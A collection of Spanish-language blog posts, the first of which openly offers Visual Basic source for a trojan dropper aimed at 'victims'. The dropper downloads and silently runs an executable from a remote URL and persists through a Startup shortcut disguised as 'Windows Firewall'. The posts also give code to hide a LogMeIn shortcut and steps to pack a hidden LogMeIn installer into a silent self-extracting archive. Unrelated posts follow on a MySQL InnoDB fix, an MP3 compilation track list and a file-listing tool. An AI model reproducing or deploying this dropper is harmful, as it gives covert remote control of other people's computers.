Esta extremadamente pequeña aplicacion, sirve para eliminar el acceso directo de logmein del menu de inicio de windows.
La apliacion es util para el troyano. FUNCIONA en windows XP, Vista, Seven
Este es el codigo:
[cc lang=”VB”]Private Declare Function SHGetSpecialFolderLocation Lib “shell32.dll” ( _
ByVal hwndOwner As Long, _
ByVal nFolder As Long, _
pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib “shell32.dll” Alias “SHGetPathFromIDListA” ( _
ByVal pidl As Long, _
ByVal pszPath As String) As Long
Private Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Private Sub Form_Load()
‘Primero vemos si existe el acceso directo
If Dir(GetSpecialfolder(CSIDL_COMMON_PROGRAMS) & “\LogMeIn.lnk”, vbNormal) = “” Then
MsgBox “No se encuentra el acceso directo”, vbCritical, “Error — Lordblacksuca”
End
End If
‘si existe, lo matamos
Call Kill(GetSpecialfolder(CSIDL_COMMON_PROGRAMS) & “\LogMeIn.lnk”)
End
End Sub
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim ret As Long, IDL As ITEMIDLIST
ret = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If ret = NOERROR Then
Path$ = Space$(512)
ret = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) – 1)
Exit Function
End If
GetSpecialfolder = “”
End Function[/cc]
LogMeIn guarda el acceso directo en la carpeta comun a todos los usuarios.. es decir AllUsers
Bueno, aca esta la descarga del archivo ejecutable por Rapidshare
Saludos! recuerden, ante cualquier duda, comenten, y si no tienen dudas, bueno, comenten tambien!!.
Este downloader, fue creado con la intencion de utilizarlo con este post, pero cabe aclarar que sirve para cualquier otra aplicacion.
Qué es un Downloader?
Un downloader se utiliza para descargar en la maquina victima un programa pesado, es desir, que ocupa muchos MB entonces se hace imposible camuflarlo para mandarlo por messenger por ejemplo. En general, este “Programa Pesado” es un virus, o un troyano como en el caso nuestro.
Lo que hace es, basicamente, generar un server liviano, (20k) y cuando es ejecutado por la victima, se “instala” secretamente en la maquina y comienza a descargar el archivo, desde la URL que nosotros le hayamos indicado… cuando la descarga es finalizada, ejecuta el archivo descargado.
Eso es todo.
Comenzamos con el desarrollo de nuestro Downloader
El codigo está escrito en VB, solo hay que pegar el codigo en un Form, compilar y Listo! no necesita de ningun complemento.
Solo hay que editar 2 lineas, una es la URL de donde se descargara el archivo, y la otra es el Path de destino (donde se guardará) el mismo.
El downloader puede descargar y ejecutar cualquier extension de archivo, siempre y cuando esa extension esté asociada con algun programa en la PC victima. (comando Shell Execute)
Este downloader, al ser ejecutado, guarda un acceso directo al ejecutable del mismo, en la carpeta de inicio del sistema (menu inicio–>programas–>inicio), esto es por si la victima apaga la pc y el archivo no se ha terminado de descargar aun, entonces cuando la vuelva a prender, se comenzara a descargar nuevamente. Una vez terminada la descarga, el acceso directo se elimina.
Este es el codigo fuente del Downloader en VB:
[cc lang=”VB”]
‘declaraciones para ejecutar una vez descargado
Private Declare Function ShellExecute Lib “shell32.dll” Alias “ShellExecuteA” (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Const SW_SHOWNORMAL = 1
‘declaraciones para guardar el archivo ini
Private Declare Function GetPrivateProfileString Lib “kernel32” Alias “GetPrivateProfileStringA” (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
Private Declare Function WritePrivateProfileString Lib “kernel32” Alias “WritePrivateProfileStringA” (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Private Declare Function FileExists Lib “shlwapi.dll” Alias “PathFileExistsA” (ByVal pszPath As String) As Long
‘declaraciones para descargar
Private Declare Function URLDownloadToFile Lib “urlmon” _
Alias “URLDownloadToFileA” _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
‘declaraciones para guardar el acceso directon en el inicio del sistema
Private Declare Function SHGetSpecialFolderLocation Lib “shell32.dll” ( _
ByVal hwndOwner As Long, _
ByVal nFolder As Long, _
pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib “shell32.dll” Alias “SHGetPathFromIDListA” ( _
ByVal pidl As Long, _
ByVal pszPath As String) As Long
Private Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Private Const CSIDL_STARTUP = &H7
Private Const CSIDL_COMMON_STARTUP = &H18
Dim obj As Object
Dim acceso_directo As Object
Private Sub form_load()
Dim estado As String
Iniciarconwindows
estado = INI_Read(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”)
If Trim(estado) = “Listo!” Then
Quitariniciarconwindows
End
End If
Dim sSourceUrl As String
Dim sDestinationUrl As String
sSourceUrl = “http://www.mipagina.com.ar/lordblacksuca.exe” ‘ esta es la URL de donde se descarga el archivo
sDestinationUrl = “C:\lordblacksuca.msi” ‘este es el path donde se va a guardar el archivo
Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Descargando”)
DownloadFile sSourceUrl, sDestinationUrl
Call ShellExecute(Me.hwnd, vbNullString, sDestinationUrl, vbNullString, vbNullString, SW_SHOWNORMAL)
Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Listo!”)
End
End Sub
‘funcion para descargar
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
‘funcion para que el programa inicie cuando se inicia windows
Private Function Iniciarconwindows()
Set obj = CreateObject(“wscript.Shell”)
Set acceso_directo = obj.CreateShortcut(GetSpecialfolder(CSIDL_STARTUP) & “\Windows Firewall.lnk”)
With acceso_directo
.TargetPath = App.Path & “\” & App.EXEName
.Save
End With
End Function
Function Quitariniciarconwindows()
If Dir(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”, vbNormal) = “” Then Exit Function
Call Kill(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”)
End Function
‘funcion para escribir y leer de un ini
Public Function INI_Read(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, Optional ByVal Default As String) As String
On Error GoTo ErrOut
Dim Size As Integer
Dim Value As String
‘Comprobamos que el archivo existe:
If Not CBool(FileExists(Filename)) Then Err.Raise 53
‘Se define el tamaño maximo de caracteres
‘que podra tener la variable Value:
Value = Space(256)
‘Se utiliza la función para obtener
‘el valor de la clave:
Size = GetPrivateProfileString(Key_Value, Key_Name, Default, Value, Len(Value), Filename)
‘Si el tamaño es mayor a 0 entonces
‘se ha encontrado el valor de la clave:
If Size > 0 Then
Value = VBA.Left$(Value, Size)
‘Devolvemos el valor de la clave:
If VBA.Right$(VBA.Trim$(Value), 1) = Chr(0) Then Value = VBA.Left$(VBA.Trim$(Value), Len(VBA.Trim$(Value)) – 1)
INI_Read = VBA.Trim$(Value)
Exit Function
End If
ErrOut:
INI_Read = Default
End Function
‘Metodo de escritura. Si el archivo al que se refiere el parametro Filename
‘no existe se crea automaticamente:
Public Sub INI_Write(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, ByVal Value As String)
On Error GoTo ErrOut
Dim Size As Integer
‘Escribimos el valor de la clave:
Size = WritePrivateProfileString(Key_Value, Key_Name, Value, Filename)
ErrOut:
End Sub
‘funcion para obtener el path al inicio del sistema
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim ret As Long, IDL As ITEMIDLIST
ret = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If ret = NOERROR Then
Path$ = Space$(512)
ret = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) – 1)
Exit Function
End If
GetSpecialfolder = “”
End Function
[/cc]
Para que no se gasten en Copiar y Pegar, aca les dejo el Proyecto de Visual Basic para que descargen:
Como habrán visto, el troyano se compone de 3 archivos. El Instalador Modificado de LogMeIn, el Patch para hacerlo invisible y un archivo .bat, para coordinar todo. Ahora, tenemos que unirlos a todos en un solo .exe
Aclaro en este punto, que existen muchas formas de hacerlo, cualquiera es válida, solo hay que tener una precaución:
Este troyano fue ideado para ejecutarse mediante una Inyección USB por lo tanto habia cosas que no importaban, pero que ahora si, por ejemplo, el archivo ejecutar.bat contiene nuestros datos de acceso a la cuenta de LogMeIn, por lo tanto, si el downloader descarga el archivo, la victima tendria “al alcance de sus manos” nuestros datos, entonces resultariamos nosotros los “hackeados”.
Eso se puede solucionar, convirtiendo el archivo .bat a .exe mediante el programa Bat to Exe Converter de esta forma:
Teniendo ese tema solucionado, solo resta unir todos los archivos necesarios para la ejecución.
Para ello, utilizamos el WinRar, y hacemos un archivo SelfExtract invisible, y que al finalizar ejecute el archivo, ejecutar.exe de esta forma:
1º Seleccionar los archivos: ejecutar.exe, el Instalador Modificado de Logmein y el Patch para hacerlo invisible, hacer click derecho sobre uno de ellos y poner Añadir al Archivo… o Add to file… si esta en inglés. (DEBES tener el WinRar instalado)
2º Seleccionamos Crear un Archivo SFX y Crear un Archivo sólido
Creando el único ejecutable
3º En la pestaña Avanzado, hacemos click en Opciones SFX… ahí debemos indicar, que los archivos se extraigan en la misma carpeta y escribimos el nombre del archivo que tiene que ejecutar al finalizar la extracción:
Opciones de SFX
4º En la pestaña Modos, configurar de la siguiente forma:
Opciones SFX "Modos"
5º Si lo deseas en la pestaña Texto e Icono, puedes seleccionar un icono para el exe final.
6º Apretar en Aceptar y Listo!
Eso fue todo.
Este archivo que hemos creado, es un único archivo .exe, que al ser ejecutado, descomprime los otros archivos en la misma carpeta, y luego ejecuta el archivo llamado ejecutar.exe que es el que inicia todo el proceso de instalacion.
OBIAMENTE, los pasos a seguir, son subir el ultimo archivo creado a un ftp, y apuntar esa URL al downloader, para que este lo descargue y ejecute.
En un próximo post, vemos como hacer para camuflar el server del downloader.
Muchas veces, nos encontramos queriendo hacer una Tabla para una Base de datos MYSQL en Ubuntu con claves foraneas, y nos damos por sorpresa que InnoDB no esta activado.
Lo primero que cualquier persona hace es: Google–> ¿Como activar InnoDB en Ubuntu? a lo que Google responde… que hay que editar el archio de configuracion, comentando la linea que dice Skip-InnoDB, y reiniciando el servicio de mysql…
PERO AVECES, ESO NO FUNCIONA, como lo fue en mi caso Mysql, sigue iniciando con InnoDB desactivado!
Ni siquiera ningun mensaje de error me tira…
el problema radica en los logs de InnoDB. al iniciar de forma incorrecta, se genera un LOG CORRUPTO, que sencillamente, no deja que se inicie InnoDB.
solucion:
ir hasta la carpeta:
/var/lib/mysql
y eliminar por completo los siguientes archivos:
ibdata1 ib_logfile0 ib_logfile1
despues reinicias mysql con la siguiente linea:
sudo /etc/init.d/mysql start
Y LISTO ahora InnoDB va a funcionar perfectamente!
Este es mi primer disco MP3, que he llamado Only for DJs
ONLY FOR DJs, es una recopilación de temas originales (sin remixar), y de los mejores servicios musicales, por ej: Mixer Zone, Galamixer, The leader Sound, Cibermusika, Elemental Mixes… y muchísimas más.
Ésta es una Re-Re-Selección de todos los temas que vienen con los servicios para Radios y DJs de éste invierno 2009
¿Porque Re-Re-Selección?
Los temas en este CD, han sido elegidos en 2 ocaciones por DJs y Operadores de Radio, es decir, por EJ: De todos los temas del Mixer Zone 46, se seleccionan algunos, los que parecen MEJORES… y de éstos se VUELVE a hacer una Selección. es desir, que lo que está en este CD es solo lo mejor de lo mejor.
LISTA DE TEMAS
Cuarteto
00 – Ale Ceberio – Año tras Año (Dueto con Lisandro Marquez)
01 – Ale Ceberio – No voy a Volver a Llorar (Dueto con Daniel Guardia)
02 – Ale Ceberio – Tres (Trío con David Ortiz e Ivan Pedraza)
03 – Banda XXI – Ritmo merenbe RMX
04 – La Konga – Cuando Baje la Marea Remix
05 – LA KONGA – VAMOS A LA PLAYA
Electronica
00 – Guru Josh Project – Infinity 2008 Klaas Remix
01 – HOT N’ COLD – MIXER ZONE DJ JOHN – KATY PERRY
02 – I SEE YOU BABY – Mixer Zone Dj Kairuz – TIESTO & MISS KITTIN
03 – JUST CAN’T GET – Dj Darfe Mixer Zone – THE SATURDAYS
04 – Kurd Maverick – Pump It Up Strings – Dj Maxi Seco Audio House 2008
05 – Love is Gone – David Guetta – Dj Skudero
06 – MEET HER AT THE LOVE PARADE (MAIN MIX) – ALEJANDRO MONTERO.
07 – Sean Kingston – Fire Burning On The Dance Floor
08 – Shakira – La Loba – Dj Donkey Dance Mix
09 – VIRTUAL DIVA – Mixe Zone Dj John – DON OMAR
10 – WATCH OUT (RADIO REMIX) – ALEX GAUDINO FEAT. SHENA
11 – YOUR LOVE – Mixer Zone Dj Chester – TOPMODELZ
Fiesta – Cumbia
00 – Altos Cumbieros . Esta es para vos
01 – COMADRE COMPADRE – Dj Galamix Gala Mixer – LOS FATALES ( Retrospective Mix )
02 – El Stylo – International Love
03 – ELLA ME LEVANTO ( Version Cumbia ) – DJ LEXUS Galamixer – Daddy Yankie
04 – Hot n cold vs Merengue (Hostile Rmx) – Katy Perry Feat Fuego
05 – LOS CAMINOS DE LA VIDA – Dj Galamix Gala Mixer – VICENTICO ( Retrospective Mix )
06 – Los Palmeras – Te Amo – Edush Batuke Mix
07 – Yayo – Adriancito – Remix
08 – Yayo Vs Dj Tonga – Esta Es Para Vos
Internacionales
00 – Dj Pich! – Michael Jackson Definitive Megamix
01 – Green Day – 21 Guns
02 – IF U SEEK AMY – Mixer Zone Dj John – BRITNEY SPEARSs
03 – JUST DANCE – Mixer Zone Dj Kairuz – LADY GAGA
04 – Latin Groove Commando All Stars – Somewhere Over The Rainbow & What A Wonderful World – Vers1
05 – Linking Park – New Divide
06 – NOT FAIR – Mixer Zone Dj John – LILY ALLEN
07 – WHEN LOVE TAKES OVER – Mixer Zone Dj John – DAVID GUETTA ft. KELLY ROWLAND
08 – WHERE IS THE LOVE – Mixer Zone Dj Mago! – BLACK EYED PEAS
09 – YOU SPIN ME ROUND – Mixer Zone Dj Kairuz – DANZEL
Lentos Romanticos
00 – Ben E. King – Stand By Me
01 – Bob Dylan – Knockin On Heavens Door
02 – Chris Isaac – Wicked Game
03 – Eric Clapton (Unplugged) – Tears In Heaven
04 – Everly Brothers – Dream
05 – Gabrielle – Out of reach
06 – Ghost
07 – HOT CHOCOLATE – You Sexy Thing
08 – Louis Armstrong – What a wonderful world
09 – Love Actually – 10 – Lynden David Hall – All You Need Is Love
10 – Michael Bolton – When A Man Loves A Woman
11 – Nancy & Frank Sinatra – Something Stupid
12 – REM – Everybody Hurts
13 – Urge Overkill – Girl, you’ll be a woman soon
14 – Wet Wet Wet – Love Is All Around
Nacionales y Varios
00 – ANDAR CONMIGO – Dj Galamix Gala Mixer – JULIETA VENEGAS ( Retrospective Mix )
01 – Bacilos – Cara De Luna – Dj Gonza Reggeaton Mix 2008
02 – CORAZON ´09 – Dj Mauromix® Gala Mixer – AUTENTICOS DECADENTES
03 – HOY – Dj Galamix Gala Mixer – GLORIA ESTEFAN ( Retrospective Mix )
04 – INTERNACIONAL LOVE – Mixer Zone Dj Mak – FIDEL NADAL
05 – Julieta Venegas – El Presente – Dj Gonza Rock Latino Mix 2008
06 – LA CAMISA NEGRA – Dj Galamix Gala Mixer – JUANES ( Retrospective Mix )
07 – Los Cafres – Un Beso Y Una Flor – Guty Dj Mix!!
08 – MI BOMBOM 09 – Dj Ale® Gala Mixer – CABAS
09 – NO SE LLAMA AMOR – Dj Galamix Gala Mixer – TURF ( Retrospective Mix )
10 – No Te Va Gustar – Pensar – Extend Mix Dj Mauro
11 – Shakira – Loba
12 – Shakira – She Wolf
13 – TU CARCEL – Dj Mauromix® Gala Mixer – ENANITOS VERDES
Reggaeton
00 – ABUSADORA – Mixer Zone Dj John – WISIN & YANDEL
01 – Calle 13 Feat Cafe Tacuba – Nadie Como Tu – Miguel Vargas Official Remix
02 – Daddy Yankee – Llamado de Emergencia – Dj McShadoW
03 – DEJAME ENTRAR – Dj Adrian® Gala Mixer – MACANO
04 – DIME SI TE VAS CON EL – Mixer Zone Dj Picky – NIGGA (Especial para DJs)
05 – DON OMAR – CHEQUEA COMO SE MENEA ( VIRTUAL DIVA ) – ORCO EDIT FOR DJ’S MIX
06 – EDDY LOVER – NO DEBISTE VOLVER – NEGRETON MIX BY GATO IN THE MIX
07 – EDDY LOVER FEAT LA FACTORIA – PERDONAME – ULTRA LOUNGE MIX DJ CAOS
08 – EL AMOR – Mixer Zone Dj John – TITO EL BAMBINO
09 – GASOLINA – Sound Master Djs Group (Dj Kastor) – DADDY YANKE (retroregg-K).mp3
10 – ME ESTAS TENTANDO – Dj Galamix Gala Mixer – WISIN & YANDEL
11 – MORIRE – LA FACTORIA FT TOBY LOVE
12 – POSE – Dj Marcosmix Gala Mixer – DADDY YANKEE
13 – SHH SHH NADIE LO SABRA – Dj Joe® Gala Mixer – CRONI K
14 – SOY IGUAL QUE TU – ALEXIS & FIDO FT EDDIE LOVER
15 – TE AMO – DJ LEXUS Galamixer – MACANO
16 – TE AMO TANTO – Dj Joe® Gala Mixer – NIGGA
17 – VEO VEO – Dj Zeus Gala Mixer – LOS GUAJIROS
Retro 80s & 90s
00 – 2Hot 4You – Cant’ Take My Eyes Off Of You – Dj Mauro Mix
01 – Ace of base – The sign (Radio edit)
02 – Big Mountain – Baby I love your way
03 – Corona – Rhythm of the night
04 – Cyndi Lauper – Hey now (Girls just wanna be fun)
05 – Depeche Mode – I just can’t get enough (electro remix 2007)
06 – Depeche mode – Just can’t get enough
07 – Dr. Alban – It´s My Life
08 – Eifel 65 – blue (da ba dee)
09 – Enganchados De Los 90 – Guty Dj Mix Vs Dj Skudero Mp3
10 – Fool´s garden – Lemos tree
11 – Genesis – I Can´t Dance
12 – Its A Beautiful Life – Ace Of Base
13 – Jamiroquai – canned heat
14 – Laura No Esta (Dj Sebas) – NECK
15 – LICK IT – Gala Mixer Dj Marcosmix – 20 FINGERS 07
16 – M People – Moving on up
17 – MC Sar and the Real McCoy – Another night
18 – Modern_Talking_-_Brother_Louie__Remix_
19 – STAR_ON_45_-_DJ_LEXUS_Galamixer_-_Global_Djs
20 – The bad touch – Bloodhound gang
21 – The cardigans – Love fool
22 – The Rolling Stones – Love is strong
23 – Tom Jones & Mousse T – Sex bomb
24 – Vengaboys – we’re going to ibiza
Este es un simple creador de listas, programado en VB por mi, lo unico que hace, es seleccionar un path y listar cada archivo, de cualquier tipo en todos los directorios y subdirectorios.
MUY util cuando se desea hacer una lista de archivos mp3.
